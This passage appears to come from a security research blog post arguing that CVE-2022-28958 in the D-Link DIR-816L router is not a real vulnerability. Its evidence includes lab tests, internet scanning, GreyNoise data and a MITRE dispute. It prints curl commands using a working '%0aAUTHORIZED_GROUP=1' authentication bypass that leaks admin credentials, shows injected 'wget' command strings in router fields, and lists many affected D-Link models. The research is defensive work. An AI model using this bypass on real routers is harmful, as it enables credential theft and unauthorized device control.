devices.",[1920,114495,114497],{"id":114496},"internet-scanning","Internet Scanning",[18,114499,114500,114501,114504,114505,114508,114509,31686],{},"As stated earlier, the researcher’s original proof of concept had ",[886,114502,114503],{},"%0aAUTHORIZED_GROUP=1"," at the end of the payload. This authentication bypass satisfies the ",[886,114506,114507],{},"AUTHORIZED_GROUP"," check in DIR-816L PHP files (including ",[886,114510,112717],{},[1354,114512,114514],{"className":1367,"code":114513,"language":1369,"meta":219,"style":219},"if ($AUTHORIZED_GROUP \u003C 0)\n{\n $result = \"FAIL\";\n $reason = i18n(\"Permission deny. The user is unauthorized.\");\n}\nelse\n{\n if ($_POST[\"action\"] == \"sethostname\")\n {\n $value = $_POST[\"value\"];\n if ($value != \"\")\n {\n set(\"\u002Fdevice\u002Fgw_name\", $value);\n event(\"SHAREPORT.SETGWNAME\");\n $RESULT = \"OK\";\n $REASON = \"\"; \n }\n } \n else fail(i18n(\"Unknown ACTION!\"));\n}\n?>\n",[886,114515,114516,114530,114534,114550,114570,114574,114578,114582,114610,114614,114636,114650,114654,114674,114688,114704,114718,114722,114728,114748,114752],{"__ignoreMap":219},[1373,114517,114518,114520,114522,114524,114526,114528],{"class":1375,"line":1376},[1373,114519,4637],{"class":4636},[1373,114521,47425],{"class":1383},[1373,114523,112731],{"class":4640},[1373,114525,11852],{"class":1397},[1373,114527,5557],{"class":5467},[1373,114529,11875],{"class":1383},[1373,114531,114532],{"class":1375,"line":220},[1373,114533,8904],{"class":1383},[1373,114535,114536,114538,114540,114542,114544,114546,114548],{"class":1375,"line":1266},[1373,114537,7362],{"class":1383},[1373,114539,100518],{"class":4640},[1373,114541,5417],{"class":1397},[1373,114543,4883],{"class":1387},[1373,114545,112754],{"class":1391},[1373,114547,183],{"class":1387},[1373,114549,4912],{"class":1383},[1373,114551,114552,114554,114556,114558,114560,114562,114564,114566,114568],{"class":1375,"line":1852},[1373,114553,7362],{"class":1383},[1373,114555,112765],{"class":4640},[1373,114557,5417],{"class":1397},[1373,114559,112770],{"class":7297},[1373,114561,1384],{"class":1383},[1373,114563,183],{"class":1387},[1373,114565,112777],{"class":1391},[1373,114567,183],{"class":1387},[1373,114569,4680],{"class":1383},[1373,114571,114572],{"class":1375,"line":4692},[1373,114573,1855],{"class":1383},[1373,114575,114576],{"class":1375,"line":4724},[1373,114577,112790],{"class":4636},[1373,114579,114580],{"class":1375,"line":4756},[1373,114581,8904],{"class":1383},[1373,114583,114584,114586,114588,114590,114592,114594,114596,114598,114600,114602,114604,114606,114608],{"class":1375,"line":4768},[1373,114585,4695],{"class":4636},[1373,114587,47425],{"class":1383},[1373,114589,100083],{"class":4640},[1373,114591,7035],{"class":1383},[1373,114593,183],{"class":1387},[1373,114595,100044],{"class":1391},[1373,114597,183],{"class":1387},[1373,114599,15050],{"class":1383},[1373,114601,16406],{"class":1397},[1373,114603,4883],{"class":1387},[1373,114605,112819],{"class":1391},[1373,114607,183],{"class":1387},[1373,114609,11875],{"class":1383},[1373,114611,114612],{"class":1375,"line":4792},[1373,114613,9613],{"class":1383},[1373,114615,114616,114618,114620,114622,114624,114626,114628,114630,114632,114634],{"class":1375,"line":4798},[1373,114617,4727],{"class":1383},[1373,114619,100300],{"class":4640},[1373,114621,5417],{"class":1397},[1373,114623,4656],{"class":1383},[1373,114625,100083],{"class":4640},[1373,114627,7035],{"class":1383},[1373,114629,183],{"class":1387},[1373,114631,85021],{"class":1391},[1373,114633,183],{"class":1387},[1373,114635,34699],{"class":1383},[1373,114637,114638,114640,114642,114644,114646,114648],{"class":1375,"line":4806},[1373,114639,9773],{"class":4636},[1373,114641,47425],{"class":1383},[1373,114643,100300],{"class":4640},[1373,114645,15677],{"class":1397},[1373,114647,16579],{"class":1387},[1373,114649,11875],{"class":1383},[1373,114651,114652],{"class":1375,"line":4817},[1373,114653,9788],{"class":1383},[1373,114655,114656,114658,114660,114662,114664,114666,114668,114670,114672],{"class":1375,"line":4825},[1373,114657,112872],{"class":7297},[1373,114659,1384],{"class":1383},[1373,114661,183],{"class":1387},[1373,114663,112879],{"class":1391},[1373,114665,183],{"class":1387},[1373,114667,5437],{"class":1383},[1373,114669,4656],{"class":1383},[1373,114671,85021],{"class":4640},[1373,114673,4680],{"class":1383},[1373,114675,114676,114678,114680,114682,114684,114686],{"class":1375,"line":4835},[1373,114677,112894],{"class":7297},[1373,114679,1384],{"class":1383},[1373,114681,183],{"class":1387},[1373,114683,112901],{"class":1391},[1373,114685,183],{"class":1387},[1373,114687,4680],{"class":1383},[1373,114689,114690,114692,114694,114696,114698,114700,114702],{"class":1375,"line":4843},[1373,114691,47435],{"class":1383},[1373,114693,112912],{"class":4640},[1373,114695,5417],{"class":1397},[1373,114697,4883],{"class":1387},[1373,114699,112919],{"class":1391},[1373,114701,183],{"class":1387},[1373,114703,4912],{"class":1383},[1373,114705,114706,114708,114710,114712,114714,114716],{"class":1375,"line":4849},[1373,114707,47435],{"class":1383},[1373,114709,112930],{"class":4640},[1373,114711,5417],{"class":1397},[1373,114713,16579],{"class":1387},[1373,114715,39663],{"class":1383},[1373,114717,108366],{"class":4640},[1373,114719,114720],{"class":1375,"line":4877},[1373,114721,9861],{"class":1383},[1373,114723,114724,114726],{"class":1375,"line":4915},[1373,114725,28032],{"class":1383},[1373,114727,47181],{"class":4640},[1373,114729,114730,114732,114734,114736,114738,114740,114742,114744,114746],{"class":1375,"line":4931},[1373,114731,7643],{"class":4636},[1373,114733,112955],{"class":7297},[1373,114735,1384],{"class":1383},[1373,114737,112960],{"class":7297},[1373,114739,1384],{"class":1383},[1373,114741,183],{"class":1387},[1373,114743,112967],{"class":1391},[1373,114745,183],{"class":1387},[1373,114747,1413],{"class":1383},[1373,114749,114750],{"class":1375,"line":4947},[1373,114751,1855],{"class":1383},[1373,114753,114754],{"class":1375,"line":4952},[1373,114755,113736],{"class":1397},[18,114757,114758],{},"The bypass is useful because it gives an attacker access to most of the router's PHP logic. As we’ve stated, the bypass has been assigned five CVE at this point, and it's typically associated with a credential leak (which also happens to work on the DIR-816L):",[100588,114760,114761],{},[1354,114762,114764],{"className":31740,"code":114763,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2019-10891$ curl http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php -d \"SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1\"\n",[886,114765,114766],{"__ignoreMap":219},[1373,114767,114768,114771,114773,114775,114777,114779,114782],{"class":1375,"line":1376},[1373,114769,114770],{"class":2206},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2019-10891$",[1373,114772,2222],{"class":1391},[1373,114774,113018],{"class":1391},[1373,114776,87473],{"class":2209},[1373,114778,4883],{"class":1387},[1373,114780,114781],{"class":1391},"SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1",[1373,114783,19057],{"class":1387},[1354,114785,114787],{"className":56326,"code":114786,"language":56328,"meta":219,"style":219},"\u003C?xml version=\"1.0\" encoding=\"utf-8\"?>\n\u003Cpostxml>\n\u003Cmodule>\n \u003Cservice>DEVICE.ACCOUNT\u003C\u002Fservice>\n \u003Cdevice>\n \u003Cgw_name>wget http:\u002F\u002F192.168.0.164\u002Ftest\u003C\u002Fgw_name>\n \n \u003Caccount>\n \u003Cseqno>1\u003C\u002Fseqno>\n \u003Cmax>2\u003C\u002Fmax>\n \u003Ccount>1\u003C\u002Fcount>\n \u003Centry>\n \u003Cuid>USR-\u003C\u002Fuid>\n \u003Cname>Admin\u003C\u002Fname>\n \u003Cusrid>\u003C\u002Fusrid>\n \u003Cpassword>labpass1\u003C\u002Fpassword>\n \u003Cgroup>0\u003C\u002Fgroup>\n \u003Cdescription>\u003C\u002Fdescription>\n \u003C\u002Fentry>\n \u003C\u002Faccount>\n \u003Cgroup>\n \u003Cseqno>\u003C\u002Fseqno>\n \u003Cmax>\u003C\u002Fmax>\n \u003Ccount>0\u003C\u002Fcount>\n \u003C\u002Fgroup>\n \u003Csession>\n \u003Ccaptcha>0\u003C\u002Fcaptcha>\n \u003Cdummy>\u003C\u002Fdummy>\n \u003Ctimeout>180\u003C\u002Ftimeout>\n \u003Cmaxsession>128\u003C\u002Fmaxsession>\n \u003Cmaxauthorized>16\u003C\u002Fmaxauthorized>\n \u003C\u002Fsession>\n \u003C\u002Fdevice>\n\u003C\u002Fmodule>\n\u003C\u002Fpostxml>\n",[886,114788,114789,114817,114825,114833,114850,114859,114876,114880,114888,114905,114922,114939,114947,114964,114981,114994,115010,115027,115039,115047,115055,115063,115075,115087,115103,115111,115119,115135,115148,115165,115183,115200,115208,115216,115224],{"__ignoreMap":219},[1373,114790,114791,114793,114795,114797,114799,114801,114803,114805,114807,114809,114811,114813,114815],{"class":1375,"line":1376},[1373,114792,2323],{"class":1383},[1373,114794,56328],{"class":6300},[1373,114796,45880],{"class":8252},[1373,114798,5417],{"class":1383},[1373,114800,183],{"class":1387},[1373,114802,84878],{"class":1391},[1373,114804,183],{"class":1387},[1373,114806,84883],{"class":8252},[1373,114808,5417],{"class":1383},[1373,114810,183],{"class":1387},[1373,114812,48993],{"class":1391},[1373,114814,183],{"class":1387},[1373,114816,113736],{"class":1383},[1373,114818,114819,114821,114823],{"class":1375,"line":220},[1373,114820,11852],{"class":1383},[1373,114822,113743],{"class":6300},[1373,114824,6765],{"class":1383},[1373,114826,114827,114829,114831],{"class":1375,"line":1266},[1373,114828,11852],{"class":1383},[1373,114830,49176],{"class":6300},[1373,114832,6765],{"class":1383},[1373,114834,114835,114837,114839,114841,114844,114846,114848],{"class":1375,"line":1852},[1373,114836,8246],{"class":1383},[1373,114838,99380],{"class":6300},[1373,114840,5384],{"class":1383},[1373,114842,114843],{"class":4640},"DEVICE.ACCOUNT",[1373,114845,46627],{"class":1383},[1373,114847,99380],{"class":6300},[1373,114849,6765],{"class":1383},[1373,114851,114852,114854,114857],{"class":1375,"line":4692},[1373,114853,8246],{"class":1383},[1373,114855,114856],{"class":6300},"device",[1373,114858,6765],{"class":1383},[1373,114860,114861,114863,114865,114867,114870,114872,114874],{"class":1375,"line":4724},[1373,114862,46606],{"class":1383},[1373,114864,114441],{"class":6300},[1373,114866,5384],{"class":1383},[1373,114868,114869],{"class":4640},"wget http:\u002F\u002F192.168.0.164\u002Ftest",[1373,114871,46627],{"class":1383},[1373,114873,114441],{"class":6300},[1373,114875,6765],{"class":1383},[1373,114877,114878],{"class":1375,"line":4756},[1373,114879,51244],{"class":4640},[1373,114881,114882,114884,114886],{"class":1375,"line":4768},[1373,114883,46606],{"class":1383},[1373,114885,50018],{"class":6300},[1373,114887,6765],{"class":1383},[1373,114889,114890,114892,114895,114897,114899,114901,114903],{"class":1375,"line":4792},[1373,114891,46655],{"class":1383},[1373,114893,114894],{"class":6300},"seqno",[1373,114896,5384],{"class":1383},[1373,114898,467],{"class":4640},[1373,114900,46627],{"class":1383},[1373,114902,114894],{"class":6300},[1373,114904,6765],{"class":1383},[1373,114906,114907,114909,114912,114914,114916,114918,114920],{"class":1375,"line":4798},[1373,114908,46655],{"class":1383},[1373,114910,114911],{"class":6300},"max",[1373,114913,5384],{"class":1383},[1373,114915,353],{"class":4640},[1373,114917,46627],{"class":1383},[1373,114919,114911],{"class":6300},[1373,114921,6765],{"class":1383},[1373,114923,114924,114926,114929,114931,114933,114935,114937],{"class":1375,"line":4806},[1373,114925,46655],{"class":1383},[1373,114927,114928],{"class":6300},"count",[1373,114930,5384],{"class":1383},[1373,114932,467],{"class":4640},[1373,114934,46627],{"class":1383},[1373,114936,114928],{"class":6300},[1373,114938,6765],{"class":1383},[1373,114940,114941,114943,114945],{"class":1375,"line":4817},[1373,114942,46655],{"class":1383},[1373,114944,38540],{"class":6300},[1373,114946,6765],{"class":1383},[1373,114948,114949,114951,114953,114955,114958,114960,114962],{"class":1375,"line":4825},[1373,114950,46674],{"class":1383},[1373,114952,75926],{"class":6300},[1373,114954,5384],{"class":1383},[1373,114956,114957],{"class":4640},"USR-",[1373,114959,46627],{"class":1383},[1373,114961,75926],{"class":6300},[1373,114963,6765],{"class":1383},[1373,114965,114966,114968,114970,114972,114975,114977,114979],{"class":1375,"line":4835},[1373,114967,46674],{"class":1383},[1373,114969,30774],{"class":6300},[1373,114971,5384],{"class":1383},[1373,114973,114974],{"class":4640},"Admin",[1373,114976,46627],{"class":1383},[1373,114978,30774],{"class":6300},[1373,114980,6765],{"class":1383},[1373,114982,114983,114985,114988,114990,114992],{"class":1375,"line":4843},[1373,114984,46674],{"class":1383},[1373,114986,114987],{"class":6300},"usrid",[1373,114989,49120],{"class":1383},[1373,114991,114987],{"class":6300},[1373,114993,6765],{"class":1383},[1373,114995,114996,114998,115000,115002,115004,115006,115008],{"class":1375,"line":4849},[1373,114997,46674],{"class":1383},[1373,114999,86310],{"class":6300},[1373,115001,5384],{"class":1383},[1373,115003,89173],{"class":4640},[1373,115005,46627],{"class":1383},[1373,115007,86310],{"class":6300},[1373,115009,6765],{"class":1383},[1373,115011,115012,115014,115017,115019,115021,115023,115025],{"class":1375,"line":4877},[1373,115013,46674],{"class":1383},[1373,115015,115016],{"class":6300},"group",[1373,115018,5384],{"class":1383},[1373,115020,445],{"class":4640},[1373,115022,46627],{"class":1383},[1373,115024,115016],{"class":6300},[1373,115026,6765],{"class":1383},[1373,115028,115029,115031,115033,115035,115037],{"class":1375,"line":4915},[1373,115030,46674],{"class":1383},[1373,115032,79737],{"class":6300},[1373,115034,49120],{"class":1383},[1373,115036,79737],{"class":6300},[1373,115038,6765],{"class":1383},[1373,115040,115041,115043,115045],{"class":1375,"line":4931},[1373,115042,85070],{"class":1383},[1373,115044,38540],{"class":6300},[1373,115046,6765],{"class":1383},[1373,115048,115049,115051,115053],{"class":1375,"line":4947},[1373,115050,85087],{"class":1383},[1373,115052,50018],{"class":6300},[1373,115054,6765],{"class":1383},[1373,115056,115057,115059,115061],{"class":1375,"line":4952},[1373,115058,46606],{"class":1383},[1373,115060,115016],{"class":6300},[1373,115062,6765],{"class":1383},[1373,115064,115065,115067,115069,115071,115073],{"class":1375,"line":6776},[1373,115066,46655],{"class":1383},[1373,115068,114894],{"class":6300},[1373,115070,49120],{"class":1383},[1373,115072,114894],{"class":6300},[1373,115074,6765],{"class":1383},[1373,115076,115077,115079,115081,115083,115085],{"class":1375,"line":6781},[1373,115078,46655],{"class":1383},[1373,115080,114911],{"class":6300},[1373,115082,49120],{"class":1383},[1373,115084,114911],{"class":6300},[1373,115086,6765],{"class":1383},[1373,115088,115089,115091,115093,115095,115097,115099,115101],{"class":1375,"line":7524},[1373,115090,46655],{"class":1383},[1373,115092,114928],{"class":6300},[1373,115094,5384],{"class":1383},[1373,115096,445],{"class":4640},[1373,115098,46627],{"class":1383},[1373,115100,114928],{"class":6300},[1373,115102,6765],{"class":1383},[1373,115104,115105,115107,115109],{"class":1375,"line":7530},[1373,115106,85087],{"class":1383},[1373,115108,115016],{"class":6300},[1373,115110,6765],{"class":1383},[1373,115112,115113,115115,115117],{"class":1375,"line":7546},[1373,115114,46606],{"class":1383},[1373,115116,4664],{"class":6300},[1373,115118,6765],{"class":1383},[1373,115120,115121,115123,115125,115127,115129,115131,115133],{"class":1375,"line":7571},[1373,115122,46655],{"class":1383},[1373,115124,104608],{"class":6300},[1373,115126,5384],{"class":1383},[1373,115128,445],{"class":4640},[1373,115130,46627],{"class":1383},[1373,115132,104608],{"class":6300},[1373,115134,6765],{"class":1383},[1373,115136,115137,115139,115142,115144,115146],{"class":1375,"line":7598},[1373,115138,46655],{"class":1383},[1373,115140,115141],{"class":6300},"dummy",[1373,115143,49120],{"class":1383},[1373,115145,115141],{"class":6300},[1373,115147,6765],{"class":1383},[1373,115149,115150,115152,115154,115156,115159,115161,115163],{"class":1375,"line":7615},[1373,115151,46655],{"class":1383},[1373,115153,86559],{"class":6300},[1373,115155,5384],{"class":1383},[1373,115157,115158],{"class":4640},"180",[1373,115160,46627],{"class":1383},[1373,115162,86559],{"class":6300},[1373,115164,6765],{"class":1383},[1373,115166,115167,115169,115172,115174,115177,115179,115181],{"class":1375,"line":7635},[1373,115168,46655],{"class":1383},[1373,115170,115171],{"class":6300},"maxsession",[1373,115173,5384],{"class":1383},[1373,115175,115176],{"class":4640},"128",[1373,115178,46627],{"class":1383},[1373,115180,115171],{"class":6300},[1373,115182,6765],{"class":1383},[1373,115184,115185,115187,115190,115192,115194,115196,115198],{"class":1375,"line":7640},[1373,115186,46655],{"class":1383},[1373,115188,115189],{"class":6300},"maxauthorized",[1373,115191,5384],{"class":1383},[1373,115193,39254],{"class":4640},[1373,115195,46627],{"class":1383},[1373,115197,115189],{"class":6300},[1373,115199,6765],{"class":1383},[1373,115201,115202,115204,115206],{"class":1375,"line":7648},[1373,115203,85087],{"class":1383},[1373,115205,4664],{"class":6300},[1373,115207,6765],{"class":1383},[1373,115209,115210,115212,115214],{"class":1375,"line":7672},[1373,115211,56557],{"class":1383},[1373,115213,114856],{"class":6300},[1373,115215,6765],{"class":1383},[1373,115217,115218,115220,115222],{"class":1375,"line":7688},[1373,115219,46627],{"class":1383},[1373,115221,49176],{"class":6300},[1373,115223,6765],{"class":1383},[1373,115225,115226,115228,115230],{"class":1375,"line":7709},[1373,115227,46627],{"class":1383},[1373,115229,113743],{"class":6300},[1373,115231,6765],{"class":1383},[18,115233,115234,115235,115238],{},"Credential leaks on routers are useful for attackers that manipulate router configurations or upload malicious firmware, but for our purposes, the authentication bypass can be used to grab detailed version information from the ",[886,115236,115237],{},"\u002FDevInfo.txt"," endpoint. Like this:",[100588,115240,115241],{},[1354,115242,115244],{"className":31740,"code":115243,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2019-10891$ curl http:\u002F\u002F192.168.0.1\u002FDevInfo.txt?vuln=check%0aAUTHORIZED_GROUP=1270\nFirmware External Version: V2.06\nFirmware Internal Version: f4jc\nModel Name: DIR-816L\nHardware Version:\nWLAN Domain: CA\nKernel: 2.6.30.9\nLanguage: en\nGraphcal Authentication: Disable\nLAN MAC: f8:e9:03:c1:81:b4\nWAN MAC: f8:e9:03:c1:81:b7\nWLAN MAC: f8:e9:03:c1:81:b4\n",[886,115245,115246,115258,115272,115284,115295,115302,115313,115321,115329,115340,115351,115361],{"__ignoreMap":219},[1373,115247,115248,115250,115252,115255],{"class":1375,"line":1376},[1373,115249,114770],{"class":2206},[1373,115251,2222],{"class":1391},[1373,115253,115254],{"class":1391}," http:\u002F\u002F192.168.0.1\u002FDevInfo.txt?vuln=check%0aAUTHORIZED_GROUP=",[1373,115256,115257],{"class":5467},"1270\n",[1373,115259,115260,115263,115266,115269],{"class":1375,"line":220},[1373,115261,115262],{"class":2206},"Firmware",[1373,115264,115265],{"class":1391}," External",[1373,115267,115268],{"class":1391}," Version:",[1373,115270,115271],{"class":1391}," V2.06\n",[1373,115273,115274,115276,115279,115281],{"class":1375,"line":1266},[1373,115275,115262],{"class":2206},[1373,115277,115278],{"class":1391}," Internal",[1373,115280,115268],{"class":1391},[1373,115282,115283],{"class":1391}," f4jc\n",[1373,115285,115286,115289,115292],{"class":1375,"line":1852},[1373,115287,115288],{"class":2206},"Model",[1373,115290,115291],{"class":1391}," Name:",[1373,115293,115294],{"class":1391}," DIR-816L\n",[1373,115296,115297,115299],{"class":1375,"line":4692},[1373,115298,68462],{"class":2206},[1373,115300,115301],{"class":1391}," Version:\n",[1373,115303,115304,115307,115310],{"class":1375,"line":4724},[1373,115305,115306],{"class":2206},"WLAN",[1373,115308,115309],{"class":1391}," Domain:",[1373,115311,115312],{"class":1391}," CA\n",[1373,115314,115315,115318],{"class":1375,"line":4756},[1373,115316,115317],{"class":2206},"Kernel:",[1373,115319,115320],{"class":5467}," 2.6.30.9\n",[1373,115322,115323,115326],{"class":1375,"line":4768},[1373,115324,115325],{"class":2206},"Language:",[1373,115327,115328],{"class":1391}," en\n",[1373,115330,115331,115334,115337],{"class":1375,"line":4792},[1373,115332,115333],{"class":2206},"Graphcal",[1373,115335,115336],{"class":1391}," Authentication:",[1373,115338,115339],{"class":1391}," Disable\n",[1373,115341,115342,115345,115348],{"class":1375,"line":4798},[1373,115343,115344],{"class":2206},"LAN",[1373,115346,115347],{"class":1391}," MAC:",[1373,115349,115350],{"class":1391}," f8:e9:03:c1:81:b4\n",[1373,115352,115353,115356,115358],{"class":1375,"line":4806},[1373,115354,115355],{"class":2206},"WAN",[1373,115357,115347],{"class":1391},[1373,115359,115360],{"class":1391}," f8:e9:03:c1:81:b7\n",[1373,115362,115363,115365,115367],{"class":1375,"line":4817},[1373,115364,115306],{"class":2206},[1373,115366,115347],{"class":1391},[1373,115368,115350],{"class":1391},[18,115370,115371,115372,115375,115376,115378,115379,4606],{},"Using the bypass also allows us to read ",[886,115373,115374],{},"\u002Fmydlink\u002Fget_WanSetting.asp"," which contains the “exploited” hostname. For example, below you can see the ",[886,115377,1553],{}," command from our exploitation attempt of ",[886,115380,112717],{},[100588,115382,115383],{},[1354,115384,115386],{"className":31740,"code":115385,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2019-10891$ curl http:\u002F\u002F192.168.0.1\u002Fmydlink\u002Fget_WanSetting.asp -d \"test=test%0aAUTHORIZED_GROUP=1\"\n",[886,115387,115388],{"__ignoreMap":219},[1373,115389,115390,115392,115394,115397,115399,115401,115404],{"class":1375,"line":1376},[1373,115391,114770],{"class":2206},[1373,115393,2222],{"class":1391},[1373,115395,115396],{"class":1391}," http:\u002F\u002F192.168.0.1\u002Fmydlink\u002Fget_WanSetting.asp",[1373,115398,87473],{"class":2209},[1373,115400,4883],{"class":1387},[1373,115402,115403],{"class":1391},"test=test%0aAUTHORIZED_GROUP=1",[1373,115405,19057],{"class":1387},[1354,115407,115409],{"className":56326,"code":115408,"language":56328,"meta":219,"style":219},"\u003Cwansetting>\n\u003Cconfig.wan_ip_mode>1\u003C\u002Fconfig.wan_ip_mode>\n\u003Cconfig.wan_dhcp_gw_name>& wget http:\u002F\u002F192.168.0.164\u002Ftest & \u003C\u002Fconfig.wan_dhcp_gw_name>\n\u003Cmac_clone>f8:e9:03:c1:81:b7\u003C\u002Fmac_clone>\n... truncated ...\n",[886,115410,115411,115420,115437,115459,115477],{"__ignoreMap":219},[1373,115412,115413,115415,115418],{"class":1375,"line":1376},[1373,115414,11852],{"class":1383},[1373,115416,115417],{"class":6300},"wansetting",[1373,115419,6765],{"class":1383},[1373,115421,115422,115424,115427,115429,115431,115433,115435],{"class":1375,"line":220},[1373,115423,11852],{"class":1383},[1373,115425,115426],{"class":6300},"config.wan_ip_mode",[1373,115428,5384],{"class":1383},[1373,115430,467],{"class":4640},[1373,115432,46627],{"class":1383},[1373,115434,115426],{"class":6300},[1373,115436,6765],{"class":1383},[1373,115438,115439,115441,115444,115446,115448,115451,115453,115455,115457],{"class":1375,"line":1266},[1373,115440,11852],{"class":1383},[1373,115442,115443],{"class":6300},"config.wan_dhcp_gw_name",[1373,115445,5384],{"class":1383},[1373,115447,7218],{"class":28571},[1373,115449,115450],{"class":4640}," wget http:\u002F\u002F192.168.0.164\u002Ftest ",[1373,115452,7218],{"class":28571},[1373,115454,49129],{"class":1383},[1373,115456,115443],{"class":6300},[1373,115458,6765],{"class":1383},[1373,115460,115461,115463,115466,115468,115471,115473,115475],{"class":1375,"line":1852},[1373,115462,11852],{"class":1383},[1373,115464,115465],{"class":6300},"mac_clone",[1373,115467,5384],{"class":1383},[1373,115469,115470],{"class":4640},"f8:e9:03:c1:81:b7",[1373,115472,46627],{"class":1383},[1373,115474,115465],{"class":6300},[1373,115476,6765],{"class":1383},[1373,115478,115479],{"class":1375,"line":4692},[1373,115480,115481],{"class":4640},"... truncated ...\n",[18,115483,115484,115485,115487,115488,115490,115491,115494,115495,115497],{},"In theory, if these devices were under attack using the ",[886,115486,112717],{}," vulnerability, then we’d be able to find artifacts of exploitation on internet-facing devices by querying ",[886,115489,115374],{},". We did just that. Using a list of 6000+ routers from Shodan, we found ",[295,115492,115493],{},"zero"," routers with evidence of ",[886,115496,112717],{}," exploitation attempts. Which means, to us, that it’s highly unlikely that anyone has attempted to use the vulnerability, as described in the CVE description, in the wild.",[1920,115499,115501],{"id":115500},"consulting-greynoise","Consulting Greynoise",[18,115503,115504,115505,115507],{},"Finally, we consulted Greynoise. They can give us insight into whether ",[886,115506,112717],{}," exploitation is hitting any of their honeypots.",[18,115509,115510],{},[68,115511],{":width":10862,"alt":112689,"src":115512},"\u002Fblog\u002Fmoobot-uses-fake-vulnerability\u002Fgreynoise_shareport.png",[18,115514,115515,115516,10515,115518,115523],{},"From the screenshot above, you can see that Greynoise isn’t seeing CVE-2022-28958 exploitation either. Greynoise does have an existing tag for the ",[886,115517,113046],{},[47,115519,115522],{"href":115520,"rel":115521},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fd-link-trendnet-getcfg-auth-bypass-attempt?days=30",[51],"authentication bypass",". As mentioned earlier, this is typically associated with a credential leak, and it does have some activity over the last 30 days.",[18,115525,115526],{},[68,115527],{":width":10862,"alt":112689,"src":115528},"\u002Fblog\u002Fmoobot-uses-fake-vulnerability\u002Fgreynoise_getcfg.png",[18,115530,115531,115532,115534],{},"But, as previously mentioned, ",[886,115533,113046],{}," is in no way related to CVE-2022-28958 other than the original researcher posting an erroneous proof of concept.",[1920,115536,88770],{"id":88769},[18,115538,115539],{},"In summary, this blog established the following:",[22,115541,115542,115545,115548,115551,115554],{},[25,115543,115544],{},"The original researcher's proof of concept for CVE-2022-28958 never worked.",[25,115546,115547],{},"Moobot copied the researcher's proof of concept and added additional errors. Their exploit never worked.",[25,115549,115550],{},"CVE-2022-28958 isn't real. We tested firmware versions 2.03b1, 2.06b1 (the reportedly vulnerable version) and 2.06b9 and found no evidence the vulnerability exists. The original researcher provided no evidence either.",[25,115552,115553],{},"Internet-facing D-Link DIR-816L did not contain artifacts that would indicate they were exploited by CVE-2022-28958.",[25,115555,115556,115557,115559],{},"GreyNoise has not seen ",[886,115558,112717],{}," HTTP requests hit their honeypots.",[18,115561,115562],{},"We conclude that CVE-2022-28958 is not a real vulnerability and at-scale exploitation has never occurred. The vulnerability should not be listed by MITRE, and it should not be in the CISA Known Exploited Vulnerabilities Catalog. We filed a dispute with MITRE and shared our findings with CISA in October 2022.",[18,115564,115565],{},[68,115566],{":width":10862,"alt":112689,"src":115567},"\u002Fblog\u002Fmoobot-uses-fake-vulnerability\u002Fdispute.png",[1920,115569,115571],{"id":115570},"addendum","Addendum",[18,115573,115574,115575,115578],{},"VulnCheck has found the following D-Link models to be vulnerable to the ",[886,115576,115577],{},"%0aAUTHORIZED_GROUP"," bypass (aka CVE-2022-28956, CVE-2020-15894, CVE-2020-9376, CVE-2019-17506, and CVE-2018-7034):",[22,115580,115581,115584,115587,115590,115593,115596,115599,115602,115605,115608,115611,115614,115617,115619,115622,115625,115628,115631,115634,115637,115640,115643,115646,115649,115652],{},[25,115582,115583],{},"DIR-300",[25,115585,115586],{},"DIR-600",[25,115588,115589],{},"DIR-605L",[25,115591,115592],{},"DIR-610",[25,115594,115595],{},"DIR-610N+",[25,115597,115598],{},"DIR-615",[25,115600,115601],{},"DIR-629",[25,115603,115604],{},"DIR-645",[25,115606,115607],{},"DIR-685",[25,115609,115610],{},"DIR-803",[25,115612,115613],{},"DIR-806",[25,115615,115616],{},"DIR-815",[25,115618,112623],{},[25,115620,115621],{},"DIR-817LW",[25,115623,115624],{},"DIR-818L",[25,115626,115627],{},"DIR-818LW",[25,115629,115630],{},"DIR-822",[25,115632,115633],{},"DIR-845L",[25,115635,115636],{},"DIR-850L",[25,115638,115639],{},"DIR-860L",[25,115641,115642],{},"DIR-865L",[25,115644,115645],{},"DIR-868L",[25,115647,115648],{},"DSL-2890AL",[25,115650,115651],{},"GO-RT-AC750",[25,115653,115654],{},"WBR-2200",[2901,115656,115657],{},"html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: 